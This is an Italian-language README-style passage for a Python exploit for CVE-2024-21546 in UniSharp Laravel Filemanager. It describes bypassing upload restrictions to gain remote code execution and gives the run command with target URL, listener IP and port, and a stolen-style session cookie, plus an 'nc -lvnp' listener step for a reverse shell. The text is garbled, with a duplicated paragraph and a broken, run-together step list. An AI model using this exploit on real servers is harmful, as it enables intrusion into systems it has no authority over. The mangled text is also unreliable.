
Questo script di exploit Python prende di mira un vulnerabile Laravel Filemanager creato da UniSharp, che consente agli utenti autenticati di aggirare le restrizioni sui file e caricare file dannosi. Questo può portare a Remote Code Execution (RCE) quando il payload caricato viene attivato.
Questo script exploit Python ha come bersaglio un vulnerabile Laravel Filemanager creato da UniSharp, che consente agli utenti autenticati di bypassare le restrizioni sui file e caricare file dannosi. Ciò può portare a Esecuzione di codice in remoto (RCE) quando il payload caricato viene attivato.
L'exploit esegue le seguenti operazioni:
laravel_session fornito dall'utente_token CSRF tramite regexVersione 2.9.1 e versioni precedenti
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
Importante: Avvia il tuo listener prima di eseguire lo script:
nc -lvnp <listener_port>
